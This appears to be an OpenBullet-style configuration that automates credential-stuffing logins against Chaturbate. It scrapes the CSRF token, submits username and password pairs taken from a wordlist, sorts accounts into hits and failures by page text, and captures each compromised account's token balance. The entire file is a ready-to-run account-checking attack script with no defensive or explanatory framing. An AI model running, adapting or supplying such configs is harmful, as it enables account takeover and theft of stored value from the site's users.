[SETTINGS]
{
  "Name": "Chaturbate",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-06-11T13:47:04.9366615+02:00",
  "AdditionalInfo": "",
  "Author": "AlexTheDane#6884",
  "Version": "1.1.3",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://chaturbate.com/auth/login/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "<input type='hidden' name='csrfmiddlewaretoken' value='" "' />" -> VAR "csrfmiddlewaretoken" 

PARSE "<COOKIES(csrftoken)>" JSON "" -> VAR "csrftoken" 

REQUEST POST "https://chaturbate.com/auth/login/" 
  CONTENT "next=&csrfmiddlewaretoken=<csrfmiddlewaretoken>&username=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "origin: https://chaturbate.com" 
  HEADER "referer: https://chaturbate.com/auth/login/" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "LOG OUT" 
  KEYCHAIN Failure OR 
    KEY "Please enter a correct username and password. Note that both fields may be case-sensitive." 

PARSE "<SOURCE>" LR "<span class='tokencount'>" "</span> Tokens" -> CAP "Tokens" 

